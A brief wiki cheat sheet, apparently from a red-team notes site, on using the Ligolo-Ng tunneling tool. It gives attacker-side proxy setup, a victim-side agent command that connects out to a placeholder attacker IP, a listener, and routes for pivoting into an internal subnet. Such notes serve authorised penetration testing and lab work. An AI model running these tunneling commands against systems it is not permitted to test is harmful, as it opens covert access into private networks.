Ligolo-Ng

From RCATs
Revision as of 04:58, 21 August 2023 by Ali3nw3rx (talk | contribs) (Created page with "== Usage: == Attacker:<syntaxhighlight lang="powershell"> sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert </syntaxhighlight>Victim:<syntaxhighlight lang="powershell"> ./agent -connect <attacker_IP>:11601 -ignore-cert </syntaxhighlight>Start the tunneling:<syntaxhighlight lang="powershell"> session 1 Start </syntaxhighlight>Add Listener:<syntaxhighlight lang="powershell"> listener_add --addr 0.0.0.0:1234 --to 127.0....")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Usage:

Attacker:

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

./proxy -selfcert

Victim:

./agent -connect <attacker_IP>:11601 -ignore-cert

Start the tunneling:

session 1 
Start

Add Listener:

listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

Add IP routes

sudo ip route add 192.168.0.0/24 dev ligolo